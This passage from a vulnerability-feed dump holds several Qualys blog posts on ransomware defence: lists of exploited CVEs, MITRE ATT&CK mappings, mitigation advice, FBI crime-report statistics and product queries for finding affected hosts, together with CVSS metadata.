\u2013 \u201cRDP Asset\u201d. This helps in automatically grouping existing hosts with this vulnerability as well as any new hosts that spin up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n### **Discover and Prioritize Ransomware Vulnerabilities** \n\nNow that hosts with \u201cRDP\u201d are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like Windows RDP, Exchange Server vulnerability and more based on the always updated Knowledgebase. \n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Ransomware asset tag in the vulnerabilities view by using this QQL query: \n\n**vulnerabilities.vulnerability.threatIntel.ransomware: true** \n\nOr \n\n**vulnerabilities.vulnerability.ransomware.name:WannaCry** \n\nThis will return a list of all impacted hosts. \n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture4-1070x377.png)\n\nUsing VMDR prioritization, the ransomware vulnerabilities can be easily prioritized using \u201cRansomware\u201d Real-Time Threat Intelligence: \n\n![](https://blog.qualys.com/wp-content/uploads/2021/09/Picture4.png)\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live threat feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\nSimply click on the impacted assets for the \u201cRansomware\u201d feeds to see the vulnerability and impacted host details.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture6.png)\n\nQualys provides the ability for a Unified Dashboard approach with the key metrics across all Apps providing key metrics against your overall security posture against Ransomware Related data points such as: \n\n * Ransomware Related vulnerabilities \n * Unauthorized Software \n * Misconfigurations leveraged by ransomware \n * Internet Facing Hosts with RDP vulnerabilities and many more\u2026 \n\nThe Unified Dashboard enabled you to track your ransomware exposure, against impacted hosts, their status, and overall management in real-time. \n\n### **Discover and Mitigate Ransomware Misconfigurations such as SMB, Insecure RDP** \n \n\n[Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) provides the Ransomware Best Practices policy which contains the critical controls mapped to MITRE ATT&CK mitigations and tactics recommended by [CISA](<https://us-cert.cisa.gov/ncas/alerts/aa21-131a>) and best practices published by [Fireye Mandiant](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>). These mitigations are effective across top techniques and can potentially reduce the risk of ransomware attacks. These critical controls can limit attacker initial access and the lateral movement around the network. \n\nAs organizations look to prevent the attacks from happening in the first place, security teams should focus on implementing these controls proactively and effectively across all assets to reduce the risk. By automating the configuration assessment with Qualys Policy Compliance, organizations can ensure golden images to conform to security baselines and prevent images from ever having misconfigurations and identify configurations drifts to prevent security risks. \n\n#### **Mitigation or Important Precautionary Measures and Controls ** \n\nThe Qualys internal research team has identified top five security measures and configuration controls; a security team should consider for their organization to prevent business interruption from a ransomware attack. Research is based on best practices published by FireEye (Mandiant), Cybersecurity and Infrastructure Security Agency (CISA), and CISA MS-ISAC. Policies/technical controls should be implemented. These configuration checks go beyond typical CIS or DISA benchmarks. \n \n\n 1. Enforce Password Policies. e.g. \n * Minimum password age should be set, \n * Password complexity requirements should be enabled. \n * Enforce password history restrictions. \n 2. Employ best practices for use of Remote Desktop protocol e. g \n * Disable RDP services if not necessary. \n * Close unused RDP ports, Audit the network for systems using RDP. \n * Apply Multifactor authentication. \n * Disable or block Server Message Block (SMB) protocol and remove or disable outdated versions of SMB. \n * RDP account controls \n 3. Employ Network security and Firewalls e.g. \n * Enforce firewall policy rules. \n * Deny all rule and allow only required networks, access. \n * Common ports and protocols that should be blocked. \n 4. Enforce Account Use Policies. E.g. \n * Apply account lockouts after a specified number of attempts. \n * Admin approval requirements. \n * Apply UAC restrictions on network logons etc. \n * Least privileges are assigned to users. \n 5. Keep Software Updated \n * Ensure automatic updates are enabled. \n * Patches, software\u2019s should be installed and updated in a timely manner which includes operating systems, applications, etc. \n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture7-1070x578.png)\n\nQualys research has mapped misconfigurations to the relevant MITRE ATTACK techniques (summarized in the table below) to define 237 configuration checks across five security areas such as RDP hardening, user controls, network, protocol and port configuration security, share and password policies and software update policies, essentially helping organizations proactively prevent 20 attack techniques leveraged in ransomware attacks. \n \n\n**TTP Map** \n\nInitial Access (TA0001)| Credential Access (TA0006)| Privilege Escalation (TA0004)| Execution (TA0002)| Defense Evasion (TA0005)| Lateral Movement (TA0008)| Command and Control (TA0011)| Impact (TA0040) \n---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Brute Force(T1110)| Abuse Elevation Control Mechanism (T1548)| Scheduled Task / Job (T1053)| Impair Defenses (T1562)| Remote Services (T1021)| Non-Application Layer Protocol (T1095)| Data Manipulation: Transmitted Data Manipulation (T1565.002) \nSupply Chain Compromise (T1195)| | Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002)| Inter-Process Communication (T1559)| Trusted Developer Utilities Proxy Execution (T1127)| Exploitation of Remote Services (T1210)| | \nSupply Chain Compromise: Compromise Software Dependencies and Development Tools (T1195.001)| | Access Token Manipulation (T1134)| | | Remote Services (T1021)| | \n | Unsecured Credentials (T1552)| | | | Remote Services: Remote Desktop Protocol (T1021.001)| | \n | | | | | Remote Services: Remote Desktop Protocol (T1021.002)| | \n | | | | | Remote Service Session Hijacking (T1563)| | \n \n### **Automated Proactive & Reactive Patching for Ransomware vulnerabilities ** \n\nTo keep the ransomware vulnerability patches always up to date on your assets, we strongly encourage users to take advantage of Qualys Zero-Touch Patch that allows users to automatically patch new ransomware-related vulnerabilities which are actively used in attacks. Qualys Zero-Touch Patch enables businesses to patch and address at least 97% of the ransomware related vulnerabilities. Faster and at scale! For more information on Qualys automatic patch capabilities, refer to blog [Automate Vulnerability Remediation with Proactive Zero-Touch Patch](<https://blog.qualys.com/product-tech/2021/09/14/optimize-vulnerability-remediation-with-zero-touch-patch>). \n\nFollowing patch management best practices, using Qualys Patch Management, allows organizations to proactively remediate vulnerabilities related to ransomware and therefore minimize ransomware attacks in their environment. A simple and efficient way to use Qualys patch management to remediate ransomware related vulnerabilities is to leverage the VMDR prioritization report, as described in a previous section, this report can be used to detect assets with ransomware related vulnerabilities. The tight integration between Qualys VMDR and Patch Management allows customers to add those ransomware related vulnerabilities directly from the prioritization report into a patch job. The Qualys engine will automatically map the selected vulnerabilities to the relevant patches, in the customer\u2019s environment, that are required to remediate the vulnerabilities. This will allow IT teams to focus on deploying those patch jobs without the need to worry about researching vulnerabilities and manually finding the relevant patches for those vulnerabilities.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture8-1070x791.png)\n\n### **Ready to Learn more and see for yourself?** \n\n[Join the webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>), Combating Risk from Ransomware Attacks, to discuss the current state of ransomware and prevention techniques. Webinar October 21, 2021, at 10am Pacific. Sign up now! \n\n**Resources** \n \n\n * [Press Release](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-launches-ransomware-risk-assessment-service/>) \n * [Ransomware Assessment Service Video](<https://vimeo.com/617379785/>) \n * [Research Powered Qualys Ransomware Risk Assessment & Remediation service](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>) \n * [Try Qualys Ransomware Risk Assessment Service](<https://www.qualys.com/forms/ransomware/>) \n * Learn more about the research and see the Qualys Ransomware Risk Assessment & Remediation service in action by attending the [webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>) \n\n### References\n\n<https://www.ic3.gov/Content/PDF/Ransomware_Fact_Sheet.pdf> <https://www.ic3.gov/Media/Y2019/PSA191002> <https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-05T12:50:00", "type": "qualysblog", "title": "The Rise of Ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551", "CVE-2015-8651", "CVE-2016-1019", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2020-1472", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-30116", "CVE-2021-34527"], "modified": "2021-10-05T12:50:00", "id": "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-05T07:29:09", "description": "_The FBI has published its annual report on Internet crime. Qualys has analyzed its trends and statistics. In this post, we review our findings, especially with regards to the prevalence of Ransomware, and our recommendations for actions that enterprises should take to mitigate their risk._\n\nEvery year the U.S. Federal Bureau of Investigation publishes [an Internet crime report](<https://www.ic3.gov/Media/PDF/AnnualReport/2021_IC3Report.pdf>) which summarizes its insights on trends and threats from cybercriminals based on all cybercrimes reported to the FBI by the American public. This annual report provides fascinating insights into the threat landscape, key trends, statistics on types of crimes, the real losses resulting from them, and perhaps most importantly, key insights into how cybercriminals operate so that we can better prepare to guard against them.\n\nFor 2021 the FBI reported 5 key threats:\n\n 1. Business Email Compromise (BEC)\n 2. Confidence Fraud / Romance Scams\n 3. Cryptocurrency\n 4. Ransomware\n 5. Tech Support Fraud\n\nOf these threats, only ransomware complaints continue to rise. Ransomware reports increased by almost 51% compared to 2020.\n\nThese complaints resulted in a total of $50 million in losses in 2021, compared to $30 million in 2020\u2014a 66% rise in total losses. Ransomware attacks hit more than [290 enterprises in 2021](<https://www.zdnet.com/article/more-than-290-enterprises-hit-by-6-ransomware-groups-in-2021/>), including major organizations like [Colonial Pipeline](<https://www.bbc.com/news/business-57178503>), [Accenture](<https://cybersecurityworks.com/blog/ransomware/csw-analysis-accenture-attacked-by-lockbit-2-0-ransomware.html>), [Acer](<https://www.bleepingcomputer.com/news/security/computer-giant-acer-hit-by-50-million-ransomware-attack/>), and [others](<https://illinois.touro.edu/news/the-10-biggest-ransomware-attacks-of-2021.php>).\n\n### Top Ransomware Attack Vectors of 2021\n\nRansomware tactics and techniques are evolving continuously, allowing attackers to make their exploits more sophisticated, resulting in an increasing ransomware threat to organizations globally. Although cybercriminals use a variety of techniques to infect victims with ransomware, the top three initial infection vectors reported remain phishing emails, Remote Desktop Protocol (RDP) exploitation, and software vulnerabilities.\n\n* * *\n\n****Get instant visibility into ransomware exposure with Qualys Cloud Platform****\n\n[Try it Now](<https://www.qualys.com/forms/ransomware/>)\n\n* * *\n\n#### Top Ransomware Variants Exploited Vulnerabilities\n\nThe FBI\u2019s investigations isolated the top 3 ransomware variants that victims suffered: CONTI, LockBit, and REvil/Sodinokibi. The chart below tallies the number of incidents reported for each variant:\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Top-Ransomware-Varaiants-1070x582.png)Source: FBI\n\nThe report states, "_According to information submitted to the Internet Crime Complaint Center (IC3), CONTI most frequently victimized the Critical Manufacturing, Commercial Facilities, and Food and Agriculture sectors. LockBit most frequently victimized the Government Facilities, Healthcare/Public Health, and Financial Services sectors. REvil/Sodinokibi most frequently victimized Financial Services, Information Technology, and Healthcare/Public Health sectors._"\n\nThe increase in remote work due to the Pandemic made four specific infection vectors more popular. Typical delivery methods for these ransomware variants were:\n\n * **Spear phishing** \u2013 campaigns using tailored emails that contain malicious attachments or malicious links\n * **Remote Desktop Protocol (RDP)** credentials that are either stolen or weak\n * **Fake software** promoted via search engine optimization that tempts users to install\n * **Common vulnerabilities** exploited in external IT assets\n\nHere are a few examples of vulnerabilities exploited in 2021 to launch successful ransomware attacks.\n\n##### Conti\n\n * "PrintNightmare" vulnerability ([CVE-2021-34527](<https://media.defense.gov/2021/Sep/22/2002859507/-1/-1/0/CSA_CONTI_RANSOMWARE_20210922.PDF>)) in Windows Print spooler service\n * "Zerologon" vulnerability ([CVE-2020-1472](<https://media.defense.gov/2021/Sep/22/2002859507/-1/-1/0/CSA_CONTI_RANSOMWARE_20210922.PDF>)) in Microsoft Active Directory Domain Controller systems\n\n##### LockBit\n\n * [CVE-2021-22986](<https://cybersecurityworks.com/blog/ransomware/csw-analysis-accenture-attacked-by-lockbit-2-0-ransomware.html>) is a critical unauthenticated, remote code execution vulnerability in the iControl REST interface, affecting BIG-IP and BIG-IQ products. It was used in the [Accenture attack](<https://cybersecurityworks.com/blog/ransomware/csw-analysis-accenture-attacked-by-lockbit-2-0-ransomware.html>).\n\n##### REvil/Sodinokibi\n\n * [CVE-2018-8453](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453>) vulnerability is exploited to elevate privileges\n\n### Recommended Ransomware Mitigations\n\n##### Update your operating system and software\n\nInternet-facing servers should be patched for known vulnerabilities regularly, as well as software processing internet data such as web browsers, browser plugins, and document readers. Software and operating systems should be upgraded regularly to the latest available version. The highest priority should be patching software and operating systems running versions that vendors no longer support.\n\n##### Implement user training and phishing exercises to raise awareness about the risks of suspicious links and attachments. Do not click on suspicious links!\n\nUser training has been proven to teach employees to avoid ransomware attacks from phishing and fake software.\n\n##### If you use Remote Desktop Protocol (RDP), secure and monitor it\n\nLimit access to resources over internal networks and monitor RDP access logs. Ensure devices are properly configured, and security features are enabled.\n\n##### Make an offline backup of your data\n\nRegularly run and maintain offline encrypted backups, then test them. Review the backup schedule of your organization and consider the possible backup disruption risk during weekends and holidays.\n\n##### Use strong passwords\n\nEnsure you have a strongly defined password policy, and ensure it is followed across the organization.\n\n##### Use multi-factor authentication\n\nApply multi-factor authentication (MFA) for all services to the extent possible, particularly for remote access, virtual private networks, and accounts that access critical systems.\n\n##### Secure your network(s): implement segmentation, filter traffic, and scan ports\n\nThe most critical communications should be occurring in the most secure and reliable layer. Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses.\n\nBlacklist the malicious URLs/websites. Scan networks for open and listening ports regularly and close those that are unnecessary.\n\n### How Can Qualys Help?\n\n##### Comprehensive Visibility into Critical Ransomware Risk Exposure\n\nGetting a complete view of your ransomware risk exposure is a big challenge. [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) helps you gain comprehensive visibility into the vulnerabilities, misconfiguration postures, and unauthorized software installed on all assets across your enterprise. Along with that, you gain visibility into available patches and can deploy these patches on the assets impacted. Our dashboard provides a glimpse of critical ransomware risk exposure across your enterprise in one unified console.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Ransomware-Exposure-Dashaboard.png)\n\n##### Continuous Detection & Prioritization for Ransomware-specific Vulnerabilities\n\nThe first step toward securing your devices from ransomware is to get complete visibility of all assets in your organization. [Qualys CSAM](<https://www.qualys.com/apps/cybersecurity-asset-management/>) provides "single pane of glass" visibility of all asset types and helps to eliminate any blind spots. You also get visibility into unmanaged assets\n\nThe FBI\u2019s 2021 report clarifies that exploitation of software vulnerabilities remains one of the top three initial infection vectors for ransomware incidents. Most noteworthy is that the top vulnerabilities are exploited using fake software and/or software versions no longer supported by the vendor. CSAM provides visibility into unauthorized and end-of-life software. An unauthorized software list helps you identify fake software that has been installed from unknown sources. \n\n* * *\n\n****Get instant visibility into ransomware exposure with Qualys Cloud Platform****\n\n[Try it Now](<https://www.qualys.com/forms/ransomware/>)\n\n* * *\n\nQualys VMDR helps you to monitor and detect ransomware vulnerabilities continuously. You can view the ransomware vulnerabilities detected on assets on which unauthorized software is running using Qualys Query Language (QQL):\n \n \n Asset dropdown - software:(authorization:Unauthorized) \n Vulnerability dropdown - vulnerabilities.vulnerability.threatIntel.ransomware:true\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Unauhtorized-software-vulnerabilities-latest-1070x602.jpg)\n\nYou can also identify all of the assets on which 2021\u2019s top three ransomware variants are detected: CONTI, LockBit, and REvil/Sodinokibi.\n\nQQL details are:\n \n \n (vulnerabilities.vulnerability.threatIntel.ransomware:true) and (vulnerabilities.vulnerability.ransomware.name:[REvil/Sodinokibi, Ryuk/Conti, lockBit])\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Search-Top-Ransomware-Vuln_new_Latest-1070x602.png)\n\nUsing Qualys VMDR prioritization, ransomware vulnerabilities can be easily prioritized by using "Ransomware" in the Real-Time Threat Indicator (RTI) filter section:\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Ransomware-Prioritization-Latest-1070x602.jpg)\n\nAlong with vulnerabilities, Qualys VMDR also keeps you up to date on evolving threats via its 'Live Threat Feed', which can help with prioritization. The "Live Threat Feed" provides visibility of high, medium, and low-rate feeds along with a count of the impacted assets. Click on the count to view more details about the impacted assets.\n\nIn the "Threat Feed" tab, search using `contents:ransomware` to find all threats associated with ransomware.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Threat_feed.png)\n\n##### Discover and Mitigate Ransomware Misconfigurations\n\nMisconfigurations often play a vital role in ransomware attacks, as they might help the attacker gain access to your assets. [Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) provides comprehensive visibility into ransomware misconfigurations. The Ransomware Best Practices policy contains the critical controls mapped to MITRE ATT&CK mitigations as well as tactics recommended by [CISA](<https://us-cert.cisa.gov/ncas/alerts/aa21-131a>) and best practices published by [Fireye Mandiant](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>). These mitigations are effective across top techniques and can potentially reduce the risk of ransomware attacks. These critical controls can limit attackers' initial access and lateral movement around your network.\n\nApply this ransomware policy to all assets across your enterprise to ensure that all assets are correctly configured. You can automate the configurations assessment and apply this to the golden images to confirm your security baselines before distribution.\n\nQualys Policy Compliance helps you to configure the recommended mitigations for the password, RDP, network security policy, and software update by applying the ransomware policies on the impacted assets.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Policy-Compliance.png)\n\n##### Automated Effortless Patching for Ransomware Vulnerabilities\n\nQualys [zero-touch patching](<https://blog.qualys.com/product-tech/2021/09/14/optimize-vulnerability-remediation-with-zero-touch-patch>) helps you automatically patch new ransomware-related vulnerabilities that are being actively exploited in attacks. It is faster and more accurate than manual patching and helps to patch up to 97% of ransomware vulnerabilities.\n\n[Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) provides a more efficient and effective way to proactively patch detected ransomware vulnerabilities. Qualys VMDR helps prioritize the ransomware vulnerabilities that Qualys PM executes. This tight integration enables you to initiate patch jobs directly from the Prioritization tab. Quick patching of critical ransomware vulnerabilities reduces ransomware risk. Auto-correlation of patches against the ransomware vulnerabilities detected reduces your overall remediation time and makes the IT team\u2019s job easier.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Patch-Management_Latest-1070x602.jpg)\n\nReady to hear more? For more details, [watch this video](<https://vimeo.com/617379785>) on our Ransomware offering. Then try out our [Ransomware Risk Assessment & Remediation Service](<https://www.qualys.com/forms/ransomware/>) at no cost for 60 days. Uncover your organization\u2019s level of exposure and create a prescribed patch plan to reduce your ransomware risk.\n\n* * *\n\n****Get instant visibility into ransomware exposure with Qualys Cloud Platform****\n\n[Try it Now](<https://www.qualys.com/forms/ransomware/>)\n\n* * *", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-04T09:40:56", "type": "qualysblog", "title": "Ransomware Insights from the FBI\u2019s 2021 Internet Crime Report", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8453", "CVE-2020-1472", "CVE-2021-22986", "CVE-2021-34527"], "modified": "2022-05-04T09:40:56", "id": "QUALYSBLOG:5A5094DBFA525D07EBC3EBA036CDF81A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-05T22:35:43", "description": "Ransomware attacks are among the most significant cyber threats facing businesses today. Recent [warnings](<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>) about [Conti](<https://en.wikipedia.org/wiki/Conti_\$ransomware\$>) ransomware, issued by a joint cybersecurity advisory from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), FBI and National Security Agency, are a strong signal that ransomware attacks are becoming even more sophisticated and massive via the ransomware-as-a-service operating model. This new model allows attackers to gain affiliates to use already-developed ransomware tools to execute ransomware attacks quickly and launch more massive attacks against almost any target including large and small businesses, schools, hospitals and national infrastructure. While every metric and trend indicate that organizations continue to add more security tools, successful attacks continue, suggesting that adding more tools isn't the answer to a strong defense.\n\nOver the last two years, phishing, insecure remote desktop protocol (RDP), and unpatched vulnerabilities have been the top attack vectors exploited by ransomware attackers. However, defenses have focused on detection and response. While detection and response help organizations reduce damage from attacks, it is not helping organizations prevent the attacks. For prevention, organizations need consistent remediation of root cause, which is why authorities like [CISA](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C_.pdf>), MS-ISAC and [NIST](<https://csrc.nist.gov/CSRC/media/Projects/ransomware-protection-and-response/documents/NIST_Ransomware_Tips_and_Tactics_Infographic.pdf>) recommend organizations adopt better prevention strategies along with tactics to monitor ransomware exposure proactively.\n\n### Clear guidelines from authorities for ransomware prevention\n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/image-1070x871.png)\n\nWhile these guidelines are helpful and represent the best ways for enterprises to shore up their defenses, security teams are resource constrained and in constant fire-fighting mode, which makes implementing these best practices a monumental task.\n\n### Qualys undertakes research on ransomware to deliver actionable insights\n\nThe Qualys security team has extensively researched CISA, MS-ISAC and NIST guidance and operationalized it into a prescriptive, actionable plan to help companies address their unique risk exposure. For example, the team analyzed the leaked [Conti Ransomware Playbook](<https://www.bleepingcomputer.com/news/security/angry-conti-ransomware-affiliate-leaks-gangs-attack-playbook/>) and historic ransomware attacks such as REvil, Nefilim, DearCry, DarkSide and Colonial Pipeline to develop comprehensive insights into specific vulnerabilities, misconfigurations, and software applications targeted in Conti, and other attacks. They then developed a targeted remediation plan for prioritized patching and configuration changes.\n\nSpanning five years and 36 ransomware families, the team's analysis of ransomware attacks stems from darknet forums, open-source tools, attack playbook analysis, threat intel feeds, and MITRE ATT&CK mitigations and tactics recommended by [CISA](<https://us-cert.cisa.gov/ncas/alerts/aa21-131a>), and best practices published by [Fireye Mandiant](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>).\n\n 1. **110 CVEs leveraged as attack vectors in most common Ransomware attacks, across 36 prevalent ransomware families with patches available for the past several years**\n\nThe Qualys research team has thoroughly studied the major ransomware attacks in the last five years and determined that these attacks used about 110 CVEs. The following table illustrates the top five CVEs exploited in high-profile ransomware attacks across six ransomware families. These five CVEs have negatively impacted millions of assets across organizations worldwide:\n\nCVE| Used by Ransomware Family| Patch Available from Vendor| Patch Available Since| Patchable From Qualys \n---|---|---|---|--- \nCVE-2013-1493| Exxroute| Yes| March 2013| Yes \nCVE-2013-0431| Reveton| Yes| February 2013| Yes \nCVE-2012-1723| Urausy| Yes| June 2012| Yes \nCVE-2019-1458| NetWalker| Yes| December 2019| Yes \nCVE-2018-12808| Ryuk/Conti| Yes| August 2018| Yes \n \n 2. **17 business software applications that should always be up to date for security patches to reduce the risk of ransomware**\nVmware | F5- Big IP| Citrix AD and Gateway \n---|---|--- \nVmware Esxi | Atlassian| Fortinate FortiGate SSL VPN \nVmware Workspace| Telerik| Microsoft Exchange Server \nOracle weblogic server| Drupal| Synacor Zimbra \nPulse Secure Connect| MobileIron| Zoom \nSkype| Teams| \n \nMany of the 110 ransomware-related CVEs have had patches available for years, with an average of five years since the date the patch was first available. Researchers found that among the 110 CVEs, most of the CVEs have patches or remediations available. Older unpatched CVEs are a favorite target of attackers, especially those on internet-exposed assets. Further analysis conducted by the Qualys research team on Conti ransomware confirms that adversaries are targeting known vulnerabilities such as Zerologon (CVE-2020-1472), PrintNightmare (CVE-2021-34527), and EternalBlue (a series of CVEs under MS17-010 exploit) for carrying out the attacks.\n\nOne of the critical effectiveness measures of a remediation program is mean-time-to-remediate (MTTR). In 2019, the Department of Homeland Security issued a directive to improve vulnerability management within the federal government and bring the average time-to-patch for critical vulnerabilities to 20 days -- down from 149 days. A recent report from [WhiteHat Security](<https://www.zdnet.com/article/average-time-to-fix-critical-cybersecurity-vulnerabilities-is-205-days-report/>) found that the average time to fix critical vulnerabilities has increased from 197 days in April 2021 to 205 days in May 2021. This year, Qualys researchers also published data that on average it took 194 days from the time when a vulnerability was found in the customer environment to when all instances were patched.\n\nOrganizations need to urgently prioritize patches for these vulnerabilities, especially on internet-facing assets that are an attacker\u2019s first target and patching critical infrastructure assets hosting critical database systems to reduce the attack surface.\n\nThe MTTR data is why authorities such as CISA and NIST recommend focusing on better prevention strategies, swift prioritization and remediation of vulnerabilities as well as reactive patching, and staying continuously up to date on patching of critical software (as noted in the chart above).\n\n 3. **237 misconfigurations leveraged across multiple MITRE tactics and techniques**\n\nAnother critical attack vector is misconfigurations such as insecure RDP and admin shares that have been leveraged in multiple ransomware attacks. Qualys research has mapped misconfigurations to the relevant MITRE ATTACK techniques to define 237 configuration checks across five security areas such as RDP hardening, user controls, network, protocol and port configuration security, share and password policies and software update policies, essentially helping organizations proactively prevent 20 attack techniques leveraged in ransomware attacks.\n\nInitial Access (TA0001)| Credential Access (TA0006)| Privilege Escalation (TA0004)| Execution (TA0002)| Defense Evasion (TA0005)| Lateral Movement (TA0008)| Command and Control (TA0011)| Impact (TA0040) \n---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Brute Force (T1110)| Abuse Elevation Control Mechanism(T1548)| Scheduled Task / Job (T1053)| Impair Defenses (T1562)| Remote Services (T1021)| Non-Application Layer Protocol (T1095)| Data Manipulation: Transmitted Data Manipulation (T1565.002) \nSupply Chain Compromise (T1195)| | Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002)| Inter-Process Communication (T1559)| Trusted Developer Utilities Proxy Execution (T1127)| Exploitation of Remote Services (T1210)| | \nSupply Chain Compromise: Compromise Software Dependencies and Development Tools (T1195.001)| | Access Token Manipulation (T1134)| | | Remote Services (T1021)| | \n | Unsecured Credentials (T1552)| | | | Remote Services: Remote Desktop Protocol (T1021.001)| | \n | | | | | Remote Services: Remote Desktop Protocol (T1021.002)| | \n | | | | | Remote Service Session Hijacking (T1563)| | \n \n 4. **Potentially risky applications to monitor in datacenter or database environment and monitoring for absence of anti-malware/virus tooling**\n\nAlong with attack vectors, research indicates that attackers have been able to laterally move inside the organization\u2019s network and drop malicious payloads due to assets lacking security tooling such as anti-malware/antivirus/EDR solutions. [CISA guidelines](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C_.pdf>) also suggest organizations should ensure antivirus and anti-malware software are installed and running across an organization\u2019s environment to eliminate security tooling blind spots.\n\nMany organizations have a policy defining authorized software for data center assets, especially those hosting critical data, which is distinctly different from software allowed on corporate assets such as employee laptops. NIST highly recommends security teams monitor assets by job function and ensure only authorized applications are in use. Among the 110 CVEs researched, a few vulnerabilities were associated with software typically found on desktop and laptop assets like collaboration tools and web browsers. This suggests that assets hosting database systems or critical enterprise applications should be monitored to ensure they are free of this software.\n\nAdditionally, the Qualys research team identified 33 known antivirus or anti-malware tools that provide malware protection against known malware, with continuous updates to the detection. Qualys recommends that organizations continuously assess their IT environment to ensure that all assets are running the latest anti-virus/malware tools.\n\n### Challenges in following guidelines for preventing ransomware attacks\n\nThe internet is flooded with articles, advice, and guidelines from security vendors and industry groups. Yet, it is clear in conversations with customers and partners that while they are looking to strengthen their prevention strategies, they are running up against issues that prevent them from operationalizing this advice.\n\n * There\u2019s no clear, comprehensive, research-driven list of ransomware-specific data points for monitoring risk exposure, nor is there a prescriptive remediation plan. Additionally, high-level guidelines from CISA and NIST require operationalization.\n * Traditional vulnerability remediation involves multiple teams and processes. First, a scanning tool identifies vulnerabilities, and next they are passed to the patching team for remediation. This fundamental challenge leads to longer vulnerability exposure times. A lack of alignment between vulnerability and patch processes and the manual efforts required for vulnerability remediation are among the key causes of delayed patching.\n * Many security leaders still rely on security controls such as EDR, XDR, next-generation firewalls (NGFW), 